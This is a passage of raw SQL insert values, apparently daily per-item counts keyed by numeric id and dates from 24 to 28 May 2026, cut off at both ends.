703,0,'20260524',1),(4712,0,'20260524',1),(4722,0,'20260524',1),(4744,0,'20260524',1),(4753,0,'20260524',1),(4756,0,'20260524',1),(4765,0,'20260524',1),(4768,0,'20260524',1),(4771,0,'20260524',1),(4776,0,'20260524',1),(4792,0,'20260524',1),(4797,0,'20260524',1),(4802,0,'20260524',1),(4862,0,'20260524',1),(4866,0,'20260524',1),(4870,0,'20260524',1),(4874,0,'20260524',1),(4888,0,'20260524',1),(4893,0,'20260524',1),(4976,0,'20260524',1),(4980,0,'20260524',1),(4983,0,'20260524',1),(4988,0,'20260524',1),(4996,0,'20260524',1),(5024,0,'20260524',1),(5028,0,'20260524',1),(5042,0,'20260524',1),(5046,0,'20260524',1),(5050,0,'20260524',1),(5054,0,'20260524',1),(5058,0,'20260524',1),(5067,0,'20260524',1),(5080,0,'20260524',1),(5122,0,'20260524',1),(5125,0,'20260524',1),(5128,0,'20260524',1),(5131,0,'20260524',1),(5134,0,'20260524',1),(5137,0,'20260524',1),(5140,0,'20260524',1),(5153,0,'20260524',1),(5248,0,'20260524',1),(5253,0,'20260524',1),(5256,0,'20260524',1),(5259,0,'20260524',1),(5264,0,'20260524',1),(5271,0,'20260524',1),(5298,0,'20260524',1),(5314,0,'20260524',1),(5317,0,'20260524',1),(5320,0,'20260524',1),(5326,0,'20260524',1),(5330,0,'20260524',1),(5359,0,'20260524',1),(5363,0,'20260524',1),(5378,0,'20260524',1),(5383,0,'20260524',1),(5400,0,'20260524',1),(5412,0,'20260524',1),(5415,0,'20260524',1),(5420,0,'20260524',1),(5428,0,'20260524',1),(5449,0,'20260524',1),(5454,0,'20260524',1),(5457,0,'20260524',1),(5464,0,'20260524',1),(5472,0,'20260524',1),(5492,0,'20260524',1),(5512,0,'20260524',1),(5567,0,'20260524',1),(5570,0,'20260524',1),(5626,0,'20260524',1),(5662,0,'20260524',1),(5674,0,'20260524',1),(5696,0,'20260524',1),(5762,0,'20260524',1),(5771,0,'20260524',1),(5778,0,'20260524',1),(5785,0,'20260524',1),(5821,0,'20260524',1),(5868,0,'20260524',1),(102,0,'20260524',2),(106,0,'20260524',2),(110,0,'20260524',2),(470,0,'20260524',2),(471,0,'20260524',2),(476,0,'20260524',2),(481,0,'20260524',2),(485,0,'20260524',2),(487,0,'20260524',2),(488,0,'20260524',2),(570,0,'20260524',2),(1590,0,'20260524',2),(1612,0,'20260524',2),(1695,0,'20260524',2),(1705,0,'20260524',2),(1709,0,'20260524',2),(1715,0,'20260524',2),(1724,0,'20260524',2),(1743,0,'20260524',2),(1768,0,'20260524',2),(1778,0,'20260524',2),(2161,0,'20260524',2),(2248,0,'20260524',2),(2293,0,'20260524',2),(2457,0,'20260524',2),(2769,0,'20260524',2),(2809,0,'20260524',2),(2965,0,'20260524',2),(3004,0,'20260524',2),(3006,0,'20260524',2),(3041,0,'20260524',2),(3072,0,'20260524',2),(3092,0,'20260524',2),(3097,0,'20260524',2),(3124,0,'20260524',2),(3226,0,'20260524',2),(3251,0,'20260524',2),(3257,0,'20260524',2),(3261,0,'20260524',2),(3263,0,'20260524',2),(3267,0,'20260524',2),(3273,0,'20260524',2),(3275,0,'20260524',2),(3280,0,'20260524',2),(3282,0,'20260524',2),(3287,0,'20260524',2),(3316,0,'20260524',2),(3738,0,'20260524',2),(3749,0,'20260524',2),(3771,0,'20260524',2),(4238,0,'20260524',2),(4329,0,'20260524',2),(4341,0,'20260524',2),(4357,0,'20260524',2),(4377,0,'20260524',2),(4387,0,'20260524',2),(4440,0,'20260524',2),(4457,0,'20260524',2),(4587,0,'20260524',2),(4591,0,'20260524',2),(4612,0,'20260524',2),(4668,0,'20260524',2),(4697,0,'20260524',2),(4759,0,'20260524',2),(4858,0,'20260524',2),(4878,0,'20260524',2),(4883,0,'20260524',2),(4897,0,'20260524',2),(4977,0,'20260524',2),(5020,0,'20260524',2),(5037,0,'20260524',2),(5062,0,'20260524',2),(5163,0,'20260524',2),(5268,0,'20260524',2),(5276,0,'20260524',2),(5280,0,'20260524',2),(5304,0,'20260524',2),(5323,0,'20260524',2),(5334,0,'20260524',2),(5353,0,'20260524',2),(5356,0,'20260524',2),(5374,0,'20260524',2),(5425,0,'20260524',2),(5436,0,'20260524',2),(5489,0,'20260524',2),(5561,0,'20260524',2),(5582,0,'20260524',2),(5585,0,'20260524',2),(5636,0,'20260524',2),(5683,0,'20260524',2),(5700,0,'20260524',2),(5735,0,'20260524',2),(5833,0,'20260524',2),(5872,0,'20260524',2),(5881,0,'20260524',2),(467,0,'20260524',3),(472,0,'20260524',3),(474,0,'20260524',3),(1584,0,'20260524',3),(1586,0,'20260524',3),(1602,0,'20260524',3),(1608,0,'20260524',3),(1713,0,'20260524',3),(1747,0,'20260524',3),(2617,0,'20260524',3),(2704,0,'20260524',3),(2748,0,'20260524',3),(2775,0,'20260524',3),(2911,0,'20260524',3),(2964,0,'20260524',3),(3030,0,'20260524',3),(3087,0,'20260524',3),(3096,0,'20260524',3),(3249,0,'20260524',3),(3265,0,'20260524',3),(3285,0,'20260524',3),(3764,0,'20260524',3),(4326,0,'20260524',3),(4396,0,'20260524',3),(4404,0,'20260524',3),(4529,0,'20260524',3),(4700,0,'20260524',3),(5146,0,'20260524',3),(5157,0,'20260524',3),(5307,0,'20260524',3),(5310,0,'20260524',3),(5397,0,'20260524',3),(5433,0,'20260524',3),(5441,0,'20260524',3),(5502,0,'20260524',3),(5738,0,'20260524',3),(5859,0,'20260524',3),(5865,0,'20260524',3),(5889,0,'20260524',3),(74,0,'20260524',4),(87,0,'20260524',4),(468,0,'20260524',4),(1582,0,'20260524',4),(5076,0,'20260524',4),(5406,0,'20260524',4),(5409,0,'20260524',4),(5593,0,'20260524',4),(5816,0,'20260524',4),(84,0,'20260524',5),(2159,0,'20260524',5),(3083,0,'20260524',5),(4654,0,'20260524',5),(5033,0,'20260524',5),(5071,0,'20260524',5),(5769,0,'20260524',5),(5847,0,'20260524',5),(5878,0,'20260524',5),(108,0,'20260524',6),(473,0,'20260524',6),(1722,0,'20260524',6),(4420,0,'20260524',6),(4930,0,'20260524',6),(5875,0,'20260524',6),(5884,0,'20260524',6),(335,0,'20260524',7),(2503,0,'20260524',7),(2904,0,'20260524',7),(2558,0,'20260524',8),(68,0,'20260524',9),(89,0,'20260524',9),(76,0,'20260524',10),(91,0,'20260524',11),(80,0,'20260524',16),(72,0,'20260524',17),(3060,0,'20260524',17),(9,0,'20260524',647),(106,0,'20260525',1),(110,0,'20260525',1),(469,0,'20260525',1),(479,0,'20260525',1),(481,0,'20260525',1),(485,0,'20260525',1),(1588,0,'20260525',1),(1594,0,'20260525',1),(1596,0,'20260525',1),(1598,0,'20260525',1),(1606,0,'20260525',1),(1705,0,'20260525',1),(1709,0,'20260525',1),(1718,0,'20260525',1),(1724,0,'20260525',1),(1732,0,'20260525',1),(1737,0,'20260525',1),(1745,0,'20260525',1),(1747,0,'20260525',1),(1749,0,'20260525',1),(1751,0,'20260525',1),(1772,0,'20260525',1),(1776,0,'20260525',1),(2152,0,'20260525',1),(2156,0,'20260525',1),(2248,0,'20260525',1),(2252,0,'20260525',1),(2296,0,'20260525',1),(2617,0,'20260525',1),(2769,0,'20260525',1),(2989,0,'20260525',1),(2991,0,'20260525',1),(2993,0,'20260525',1),(3038,0,'20260525',1),(3045,0,'20260525',1),(3083,0,'20260525',1),(3107,0,'20260525',1),(3109,0,'20260525',1),(3124,0,'20260525',1),(3127,0,'20260525',1),(3226,0,'20260525',1),(3245,0,'20260525',1),(3249,0,'20260525',1),(3261,0,'20260525',1),(3271,0,'20260525',1),(3282,0,'20260525',1),(3430,0,'20260525',1),(3479,0,'20260525',1),(3486,0,'20260525',1),(3534,0,'20260525',1),(3710,0,'20260525',1),(3735,0,'20260525',1),(3738,0,'20260525',1),(3749,0,'20260525',1),(3781,0,'20260525',1),(4301,0,'20260525',1),(4341,0,'20260525',1),(4416,0,'20260525',1),(4436,0,'20260525',1),(4448,0,'20260525',1),(4612,0,'20260525',1),(4648,0,'20260525',1),(4651,0,'20260525',1),(4657,0,'20260525',1),(4677,0,'20260525',1),(4685,0,'20260525',1),(4741,0,'20260525',1),(4744,0,'20260525',1),(4747,0,'20260525',1),(4759,0,'20260525',1),(4776,0,'20260525',1),(4862,0,'20260525',1),(4866,0,'20260525',1),(4976,0,'20260525',1),(4980,0,'20260525',1),(4983,0,'20260525',1),(5037,0,'20260525',1),(5042,0,'20260525',1),(5046,0,'20260525',1),(5058,0,'20260525',1),(5131,0,'20260525',1),(5134,0,'20260525',1),(5140,0,'20260525',1),(5146,0,'20260525',1),(5256,0,'20260525',1),(5264,0,'20260525',1),(5271,0,'20260525',1),(5276,0,'20260525',1),(5307,0,'20260525',1),(5310,0,'20260525',1),(5314,0,'20260525',1),(5317,0,'20260525',1),(5330,0,'20260525',1),(5378,0,'20260525',1),(5400,0,'20260525',1),(5409,0,'20260525',1),(5425,0,'20260525',1),(5433,0,'20260525',1),(5436,0,'20260525',1),(5449,0,'20260525',1),(5457,0,'20260525',1),(5512,0,'20260525',1),(5561,0,'20260525',1),(5567,0,'20260525',1),(5593,0,'20260525',1),(5598,0,'20260525',1),(5601,0,'20260525',1),(5605,0,'20260525',1),(5683,0,'20260525',1),(5738,0,'20260525',1),(5778,0,'20260525',1),(5859,0,'20260525',1),(5868,0,'20260525',1),(5872,0,'20260525',1),(102,0,'20260525',2),(482,0,'20260525',2),(483,0,'20260525',2),(486,0,'20260525',2),(488,0,'20260525',2),(1584,0,'20260525',2),(1586,0,'20260525',2),(1590,0,'20260525',2),(1592,0,'20260525',2),(1600,0,'20260525',2),(1604,0,'20260525',2),(1610,0,'20260525',2),(1695,0,'20260525',2),(1739,0,'20260525',2),(1766,0,'20260525',2),(1770,0,'20260525',2),(1774,0,'20260525',2),(1778,0,'20260525',2),(1780,0,'20260525',2),(1782,0,'20260525',2),(2148,0,'20260525',2),(2159,0,'20260525',2),(2293,0,'20260525',2),(2297,0,'20260525',2),(2309,0,'20260525',2),(2457,0,'20260525',2),(2704,0,'20260525',2),(2809,0,'20260525',2),(2813,0,'20260525',2),(3034,0,'20260525',2),(3072,0,'20260525',2),(3079,0,'20260525',2),(3090,0,'20260525',2),(3097,0,'20260525',2),(3102,0,'20260525',2),(3104,0,'20260525',2),(3229,0,'20260525',2),(3243,0,'20260525',2),(3253,0,'20260525',2),(3269,0,'20260525',2),(3278,0,'20260525',2),(3280,0,'20260525',2),(3285,0,'20260525',2),(3287,0,'20260525',2),(3297,0,'20260525',2),(3541,0,'20260525',2),(4238,0,'20260525',2),(4335,0,'20260525',2),(4357,0,'20260525',2),(4368,0,'20260525',2),(4377,0,'20260525',2),(4404,0,'20260525',2),(4432,0,'20260525',2),(4440,0,'20260525',2),(4524,0,'20260525',2),(4529,0,'20260525',2),(4546,0,'20260525',2),(4551,0,'20260525',2),(4556,0,'20260525',2),(4645,0,'20260525',2),(4660,0,'20260525',2),(4712,0,'20260525',2),(4802,0,'20260525',2),(4878,0,'20260525',2),(4883,0,'20260525',2),(4888,0,'20260525',2),(4893,0,'20260525',2),(5024,0,'20260525',2),(5028,0,'20260525',2),(5054,0,'20260525',2),(5067,0,'20260525',2),(5157,0,'20260525',2),(5248,0,'20260525',2),(5259,0,'20260525',2),(5292,0,'20260525',2),(5298,0,'20260525',2),(5320,0,'20260525',2),(5326,0,'20260525',2),(5353,0,'20260525',2),(5374,0,'20260525',2),(5383,0,'20260525',2),(5397,0,'20260525',2),(5415,0,'20260525',2),(5420,0,'20260525',2),(5461,0,'20260525',2),(5502,0,'20260525',2),(5515,0,'20260525',2),(5570,0,'20260525',2),(5585,0,'20260525',2),(5609,0,'20260525',2),(5662,0,'20260525',2),(5666,0,'20260525',2),(5696,0,'20260525',2),(5762,0,'20260525',2),(5785,0,'20260525',2),(5816,0,'20260525',2),(5824,0,'20260525',2),(5833,0,'20260525',2),(468,0,'20260525',3),(484,0,'20260525',3),(570,0,'20260525',3),(1582,0,'20260525',3),(1608,0,'20260525',3),(1703,0,'20260525',3),(1711,0,'20260525',3),(1734,0,'20260525',3),(2658,0,'20260525',3),(2748,0,'20260525',3),(2775,0,'20260525',3),(2801,0,'20260525',3),(3069,0,'20260525',3),(3096,0,'20260525',3),(3259,0,'20260525',3),(3263,0,'20260525',3),(3267,0,'20260525',3),(3273,0,'20260525',3),(3307,0,'20260525',3),(3316,0,'20260525',3),(4373,0,'20260525',3),(4382,0,'20260525',3),(4408,0,'20260525',3),(4412,0,'20260525',3),(4520,0,'20260525',3),(4582,0,'20260525',3),(4587,0,'20260525',3),(4988,0,'20260525',3),(5020,0,'20260525',3),(5080,0,'20260525',3),(5153,0,'20260525',3),(5359,0,'20260525',3),(5769,0,'20260525',3),(5771,0,'20260525',3),(5844,0,'20260525',3),(5881,0,'20260525',3),(5889,0,'20260525',3),(84,0,'20260525',4),(471,0,'20260525',4),(473,0,'20260525',4),(474,0,'20260525',4),(480,0,'20260525',4),(1544,0,'20260525',4),(1728,0,'20260525',4),(1743,0,'20260525',4),(2804,0,'20260525',4),(2911,0,'20260525',4),(3251,0,'20260525',4),(3313,0,'20260525',4),(4387,0,'20260525',4),(4391,0,'20260525',4),(4566,0,'20260525',4),(4591,0,'20260525',4),(4870,0,'20260525',4),(5076,0,'20260525',4),(5363,0,'20260525',4),(5406,0,'20260525',4),(5674,0,'20260525',4),(5847,0,'20260525',4),(87,0,'20260525',5),(108,0,'20260525',5),(335,0,'20260525',5),(487,0,'20260525',5),(4792,0,'20260525',5),(5821,0,'20260525',5),(5828,0,'20260525',5),(5875,0,'20260525',5),(68,0,'20260525',6),(74,0,'20260525',6),(89,0,'20260525',6),(1602,0,'20260525',6),(4930,0,'20260525',6),(5071,0,'20260525',6),(5878,0,'20260525',6),(76,0,'20260525',7),(5626,0,'20260525',7),(2503,0,'20260525',8),(2904,0,'20260525',8),(5884,0,'20260525',8),(470,0,'20260525',9),(3060,0,'20260525',10),(2558,0,'20260525',14),(91,0,'20260525',19),(72,0,'20260525',21),(80,0,'20260525',44),(9,0,'20260525',683),(102,0,'20260526',1),(335,0,'20260526',1),(472,0,'20260526',1),(484,0,'20260526',1),(1592,0,'20260526',1),(1594,0,'20260526',1),(1596,0,'20260526',1),(1604,0,'20260526',1),(1697,0,'20260526',1),(1699,0,'20260526',1),(1701,0,'20260526',1),(1707,0,'20260526',1),(1724,0,'20260526',1),(1726,0,'20260526',1),(1728,0,'20260526',1),(1737,0,'20260526',1),(1745,0,'20260526',1),(1751,0,'20260526',1),(1782,0,'20260526',1),(2159,0,'20260526',1),(2248,0,'20260526',1),(2296,0,'20260526',1),(2297,0,'20260526',1),(2503,0,'20260526',1),(2775,0,'20260526',1),(2809,0,'20260526',1),(2964,0,'20260526',1),(2965,0,'20260526',1),(3006,0,'20260526',1),(3045,0,'20260526',1),(3096,0,'20260526',1),(3097,0,'20260526',1),(3102,0,'20260526',1),(3124,0,'20260526',1),(3127,0,'20260526',1),(3245,0,'20260526',1),(3253,0,'20260526',1),(3265,0,'20260526',1),(3267,0,'20260526',1),(3275,0,'20260526',1),(3280,0,'20260526',1),(3313,0,'20260526',1),(3430,0,'20260526',1),(3534,0,'20260526',1),(3714,0,'20260526',1),(3727,0,'20260526',1),(3742,0,'20260526',1),(3777,0,'20260526',1),(4332,0,'20260526',1),(4338,0,'20260526',1),(4408,0,'20260526',1),(4416,0,'20260526',1),(4428,0,'20260526',1),(4432,0,'20260526',1),(4440,0,'20260526',1),(4448,0,'20260526',1),(4517,0,'20260526',1),(4520,0,'20260526',1),(4697,0,'20260526',1),(4703,0,'20260526',1),(4762,0,'20260526',1),(4776,0,'20260526',1),(4862,0,'20260526',1),(4893,0,'20260526',1),(4983,0,'20260526',1),(5020,0,'20260526',1),(5050,0,'20260526',1),(5080,0,'20260526',1),(5128,0,'20260526',1),(5137,0,'20260526',1),(5146,0,'20260526',1),(5157,0,'20260526',1),(5256,0,'20260526',1),(5292,0,'20260526',1),(5304,0,'20260526',1),(5310,0,'20260526',1),(5314,0,'20260526',1),(5317,0,'20260526',1),(5320,0,'20260526',1),(5326,0,'20260526',1),(5334,0,'20260526',1),(5356,0,'20260526',1),(5412,0,'20260526',1),(5461,0,'20260526',1),(5492,0,'20260526',1),(5515,0,'20260526',1),(5561,0,'20260526',1),(5626,0,'20260526',1),(5696,0,'20260526',1),(5735,0,'20260526',1),(5738,0,'20260526',1),(5769,0,'20260526',1),(5771,0,'20260526',1),(5816,0,'20260526',1),(5821,0,'20260526',1),(5824,0,'20260526',1),(5865,0,'20260526',1),(5872,0,'20260526',1),(108,0,'20260526',2),(483,0,'20260526',2),(570,0,'20260526',2),(1586,0,'20260526',2),(1602,0,'20260526',2),(1606,0,'20260526',2),(1608,0,'20260526',2),(1610,0,'20260526',2),(1703,0,'20260526',2),(1705,0,'20260526',2),(2063,0,'20260526',2),(2154,0,'20260526',2),(2161,0,'20260526',2),(2609,0,'20260526',2),(2769,0,'20260526',2),(2904,0,'20260526',2),(2956,0,'20260526',2),(2989,0,'20260526',2),(2991,0,'20260526',2),(3004,0,'20260526',2),(3023,0,'20260526',2),(3030,0,'20260526',2),(3041,0,'20260526',2),(3060,0,'20260526',2),(3240,0,'20260526',2),(3247,0,'20260526',2),(3269,0,'20260526',2),(3710,0,'20260526',2),(3731,0,'20260526',2),(3746,0,'20260526',2),(3764,0,'20260526',2),(4329,0,'20260526',2),(4368,0,'20260526',2),(4412,0,'20260526',2),(4436,0,'20260526',2),(4542,0,'20260526',2),(4612,0,'20260526',2),(4677,0,'20260526',2),(4694,0,'20260526',2),(4747,0,'20260526',2),(4768,0,'20260526',2),(4878,0,'20260526',2),(4988,0,'20260526',2),(5033,0,'20260526',2),(5076,0,'20260526',2),(5101,0,'20260526',2),(5307,0,'20260526',2),(5363,0,'20260526',2),(5425,0,'20260526',2),(5428,0,'20260526',2),(5454,0,'20260526',2),(5489,0,'20260526',2),(5601,0,'20260526',2),(5700,0,'20260526',2),(5844,0,'20260526',2),(5847,0,'20260526',2),(5859,0,'20260526',2),(5868,0,'20260526',2),(5875,0,'20260526',2),(5889,0,'20260526',2),(74,0,'20260526',3),(84,0,'20260526',3),(87,0,'20260526',3),(467,0,'20260526',3),(473,0,'20260526',3),(474,0,'20260526',3),(487,0,'20260526',3),(1590,0,'20260526',3),(1614,0,'20260526',3),(2748,0,'20260526',3),(3027,0,'20260526',3),(3083,0,'20260526',3),(3249,0,'20260526',3),(3738,0,'20260526',3),(4608,0,'20260526',3),(4712,0,'20260526',3),(4722,0,'20260526',3),(4866,0,'20260526',3),(4930,0,'20260526',3),(5248,0,'20260526',3),(5259,0,'20260526',3),(5436,0,'20260526',3),(5778,0,'20260526',3),(5878,0,'20260526',3),(468,0,'20260526',4),(470,0,'20260526',4),(1588,0,'20260526',4),(1722,0,'20260526',4),(1768,0,'20260526',4),(1780,0,'20260526',4),(2457,0,'20260526',4),(2704,0,'20260526',4),(3090,0,'20260526',4),(3735,0,'20260526',4),(3781,0,'20260526',4),(4556,0,'20260526',4),(5067,0,'20260526',4),(5071,0,'20260526',4),(5406,0,'20260526',4),(5420,0,'20260526',4),(5593,0,'20260526',4),(5762,0,'20260526',4),(5881,0,'20260526',4),(89,0,'20260526',5),(1612,0,'20260526',5),(1582,0,'20260526',6),(1600,0,'20260526',6),(4335,0,'20260526',6),(5058,0,'20260526',6),(5276,0,'20260526',6),(5359,0,'20260526',6),(5054,0,'20260526',7),(5884,0,'20260526',7),(68,0,'20260526',9),(91,0,'20260526',12),(72,0,'20260526',14),(76,0,'20260526',15),(5902,0,'20260526',21),(5906,0,'20260526',21),(5910,0,'20260526',21),(5828,0,'20260526',22),(80,0,'20260526',48),(9,0,'20260526',697),(472,0,'20260527',1),(484,0,'20260527',1),(1584,0,'20260527',1),(1590,0,'20260527',1),(1592,0,'20260527',1),(1598,0,'20260527',1),(1606,0,'20260527',1),(1608,0,'20260527',1),(1610,0,'20260527',1),(1705,0,'20260527',1),(1713,0,'20260527',1),(1724,0,'20260527',1),(1726,0,'20260527',1),(1737,0,'20260527',1),(1747,0,'20260527',1),(1768,0,'20260527',1),(1772,0,'20260527',1),(1774,0,'20260527',1),(1776,0,'20260527',1),(1780,0,'20260527',1),(2161,0,'20260527',1),(2296,0,'20260527',1),(2309,0,'20260527',1),(2457,0,'20260527',1),(2804,0,'20260527',1),(2964,0,'20260527',1),(2991,0,'20260527',1),(2993,0,'20260527',1),(3004,0,'20260527',1),(3027,0,'20260527',1),(3030,0,'20260527',1),(3041,0,'20260527',1),(3066,0,'20260527',1),(3072,0,'20260527',1),(3090,0,'20260527',1),(3092,0,'20260527',1),(3097,0,'20260527',1),(3107,0,'20260527',1),(3109,0,'20260527',1),(3117,0,'20260527',1),(3226,0,'20260527',1),(3249,0,'20260527',1),(3261,0,'20260527',1),(3265,0,'20260527',1),(3267,0,'20260527',1),(3269,0,'20260527',1),(3271,0,'20260527',1),(3280,0,'20260527',1),(3282,0,'20260527',1),(3285,0,'20260527',1),(3479,0,'20260527',1),(3489,0,'20260527',1),(3752,0,'20260527',1),(4275,0,'20260527',1),(4301,0,'20260527',1),(4329,0,'20260527',1),(4338,0,'20260527',1),(4377,0,'20260527',1),(4396,0,'20260527',1),(4404,0,'20260527',1),(4424,0,'20260527',1),(4428,0,'20260527',1),(4436,0,'20260527',1),(4444,0,'20260527',1),(4448,0,'20260527',1),(4454,0,'20260527',1),(4582,0,'20260527',1),(4587,0,'20260527',1),(4591,0,'20260527',1),(4677,0,'20260527',1),(4685,0,'20260527',1),(4694,0,'20260527',1),(4697,0,'20260527',1),(4700,0,'20260527',1),(4712,0,'20260527',1),(4750,0,'20260527',1),(4762,0,'20260527',1),(4771,0,'20260527',1),(4792,0,'20260527',1),(4858,0,'20260527',1),(4862,0,'20260527',1),(4870,0,'20260527',1),(4888,0,'20260527',1),(4893,0,'20260527',1),(4977,0,'20260527',1),(4980,0,'20260527',1),(5033,0,'20260527',1),(5037,0,'20260527',1),(5058,0,'20260527',1),(5122,0,'20260527',1),(5131,0,'20260527',1),(5134,0,'20260527',1),(5140,0,'20260527',1),(5248,0,'20260527',1),(5256,0,'20260527',1),(5259,0,'20260527',1),(5268,0,'20260527',1),(5280,0,'20260527',1),(5289,0,'20260527',1),(5292,0,'20260527',1),(5304,0,'20260527',1),(5310,0,'20260527',1),(5330,0,'20260527',1),(5353,0,'20260527',1),(5428,0,'20260527',1),(5433,0,'20260527',1),(5457,0,'20260527',1),(5472,0,'20260527',1),(5585,0,'20260527',1),(5598,0,'20260527',1),(5626,0,'20260527',1),(5636,0,'20260527',1),(5666,0,'20260527',1),(5683,0,'20260527',1),(5735,0,'20260527',1),(5738,0,'20260527',1),(5785,0,'20260527',1),(5821,0,'20260527',1),(5844,0,'20260527',1),(5847,0,'20260527',1),(5889,0,'20260527',1),(478,0,'20260527',2),(1586,0,'20260527',2),(1596,0,'20260527',2),(1695,0,'20260527',2),(1703,0,'20260527',2),(1720,0,'20260527',2),(1728,0,'20260527',2),(1741,0,'20260527',2),(1749,0,'20260527',2),(1751,0,'20260527',2),(1782,0,'20260527',2),(2152,0,'20260527',2),(2159,0,'20260527',2),(2252,0,'20260527',2),(2609,0,'20260527',2),(2658,0,'20260527',2),(2956,0,'20260527',2),(3005,0,'20260527',2),(3124,0,'20260527',2),(3229,0,'20260527',2),(3240,0,'20260527',2),(3257,0,'20260527',2),(3263,0,'20260527',2),(3275,0,'20260527',2),(3438,0,'20260527',2),(3710,0,'20260527',2),(3746,0,'20260527',2),(3764,0,'20260527',2),(4332,0,'20260527',2),(4335,0,'20260527',2),(4373,0,'20260527',2),(4387,0,'20260527',2),(4416,0,'20260527',2),(4420,0,'20260527',2),(4524,0,'20260527',2),(4529,0,'20260527',2),(4688,0,'20260527',2),(4691,0,'20260527',2),(4765,0,'20260527',2),(4768,0,'20260527',2),(5028,0,'20260527',2),(5054,0,'20260527',2),(5062,0,'20260527',2),(5125,0,'20260527',2),(5128,0,'20260527',2),(5146,0,'20260527',2),(5157,0,'20260527',2),(5295,0,'20260527',2),(5298,0,'20260527',2),(5301,0,'20260527',2),(5307,0,'20260527',2),(5334,0,'20260527',2),(5363,0,'20260527',2),(5378,0,'20260527',2),(5383,0,'20260527',2),(5406,0,'20260527',2),(5420,0,'20260527',2),(5425,0,'20260527',2),(5464,0,'20260527',2),(5593,0,'20260527',2),(5601,0,'20260527',2),(5662,0,'20260527',2),(5696,0,'20260527',2),(5762,0,'20260527',2),(5769,0,'20260527',2),(5778,0,'20260527',2),(5816,0,'20260527',2),(5828,0,'20260527',2),(5872,0,'20260527',2),(5878,0,'20260527',2),(5881,0,'20260527',2),(471,0,'20260527',3),(473,0,'20260527',3),(487,0,'20260527',3),(1602,0,'20260527',3),(1718,0,'20260527',3),(1778,0,'20260527',3),(2704,0,'20260527',3),(2751,0,'20260527',3),(2769,0,'20260527',3),(2813,0,'20260527',3),(2911,0,'20260527',3),(2965,0,'20260527',3),(3006,0,'20260527',3),(3430,0,'20260527',3),(3774,0,'20260527',3),(3781,0,'20260527',3),(4391,0,'20260527',3),(4663,0,'20260527',3),(4709,0,'20260527',3),(4753,0,'20260527',3),(4776,0,'20260527',3),(4866,0,'20260527',3),(5020,0,'20260527',3),(5076,0,'20260527',3),(5137,0,'20260527',3),(5163,0,'20260527',3),(5326,0,'20260527',3),(5397,0,'20260527',3),(5400,0,'20260527',3),(5409,0,'20260527',3),(5467,0,'20260527',3),(5492,0,'20260527',3),(5515,0,'20260527',3),(5570,0,'20260527',3),(5700,0,'20260527',3),(5859,0,'20260527',3),(5868,0,'20260527',3),(5884,0,'20260527',3),(5917,0,'20260527',3),(74,0,'20260527',4),(1612,0,'20260527',4),(1614,0,'20260527',4),(1743,0,'20260527',4),(2558,0,'20260527',4),(2617,0,'20260527',4),(3498,0,'20260527',4),(5271,0,'20260527',4),(5461,0,'20260527',4),(5824,0,'20260527',4),(5833,0,'20260527',4),(470,0,'20260527',5),(474,0,'20260527',5),(1544,0,'20260527',5),(2503,0,'20260527',5),(4930,0,'20260527',5),(5264,0,'20260527',5),(5276,0,'20260527',5),(84,0,'20260527',6),(335,0,'20260527',6),(1582,0,'20260527',6),(1588,0,'20260527',6),(108,0,'20260527',7),(3060,0,'20260527',7),(3083,0,'20260527',7),(87,0,'20260527',8),(468,0,'20260527',8),(2904,0,'20260527',8),(5902,0,'20260527',8),(5910,0,'20260527',8),(3102,0,'20260527',10),(5489,0,'20260527',11),(89,0,'20260527',12),(5906,0,'20260527',13),(68,0,'20260527',15),(76,0,'20260527',15),(72,0,'20260527',19),(80,0,'20260527',55),(91,0,'20260527',56),(9,0,'20260527',751),(102,0,'20260528',1),(110,0,'20260528',1),(467,0,'20260528',1),(472,0,'20260528',1),(477,0,'20260528',1),(480,0,'20260528',1),(482,0,'20260528',1),(483,0,'20260528',1),(1584,0,'20260528',1),(1586,0,'20260528',1),(1594,0,'20260528',1),(1596,0,'20260528',1),(1598,0,'20260528',1),(1604,0,'20260528',1),(1699,0,'20260528',1),(1701,0,'20260528',1),(1703,0,'20260528',1),(1707,0,'20260528',1),(1709,0,'20260528',1),(1715,0,'20260528',1),(1747,0,'20260528',1),(1766,0,'20260528',1),(1772,0,'20260528',1),(1782,0,'20260528',1),(2063,0,'20260528',1),(2156,0,'20260528',1),(2165,0,'20260528',1),(2296,0,'20260528',1),(2457,0,'20260528',1),(2748,0,'20260528',1),(2751,0,'20260528',1),(2769,0,'20260528',1),(2809,0,'20260528',1),(2813,0,'20260528',1),(2904,0,'20260528',1),(2956,0,'20260528',1),(2964,0,'20260528',1),(2989,0,'20260528',1),(2993,0,'20260528',1),(3023,0,'20260528',1),(3027,0,'20260528',1),(3038,0,'20260528',1),(3060,0,'20260528',1),(3083,0,'20260528',1),(3090,0,'20260528',1),(3092,0,'20260528',1),(3124,0,'20260528',1),(3240,0,'20260528',1),(3253,0,'20260528',1),(3259,0,'20260528',1),(3261,0,'20260528',1),(3265,0,'20260528',1),(3275,0,'20260528',1),(3280,0,'20260528',1),(3297,0,'20260528',1),(3307,0,'20260528',1),(3313,0,'20260528',1),(3479,0,'20260528',1),(3534,0,'20260528',1),(3724,0,'20260528',1),(3738,0,'20260528',1),(4238,0,'20260528',1),(4326,0,'20260528',1),(4332,0,'20260528',1),(4335,0,'20260528',1),(4338,0,'20260528',1),(4341,0,'20260528',1),(4357,0,'20260528',1),(4373,0,'20260528',1),(4377,0,'20260528',1),(4382,0,'20260528',1),(4404,0,'20260528',1),(4408,0,'20260528',1),(4412,0,'20260528',1),(4424,0,'20260528',1),(4432,0,'20260528',1),(4436,0,'20260528',1),(4454,0,'20260528',1),(4457,0,'20260528',1),(4517,0,'20260528',1),(4524,0,'20260528',1),(4529,0,'20260528',1),(4546,0,'20260528',1),(4551,0,'20260528',1),(4556,0,'20260528',1),(4582,0,'20260528',1),(4648,0,'20260528',1),(4660,0,'20260528',1),(4681,0,'20260528',1),(4685,0,'20260528',1),(4688,0,'20260528',1),(4694,0,'20260528',1),(4697,0,'20260528',1),(4700,0,'20260528',1),(4703,0,'20260528',1),(4744,0,'20260528',1),(4747,0,'20260528',1),(4750,0,'20260528',1),(4776,0,'20260528',1),(4792,0,'20260528',1),(4797,0,'20260528',1),(4858,0,'20260528',1),(4878,0,'20260528',1),(4883,0,'20260528',1),(4888,0,'20260528',1),(4897,0,'20260528',1),(4977,0,'20260528',1),(4980,0,'20260528',1),(5020,0,'20260528',1),(5024,0,'20260528',1),(5033,0,'20260528',1),(5046,0,'20260528',1),(5122,0,'20260528',1),(5125,0,'20260528',1),(5134,0,'20260528',1),(5137,0,'20260528',1),(5140,0,'20260528',1),(5163,0,'20260528',1),(5253,0,'20260528',1),(5295,0,'20260528',1),(5317,0,'2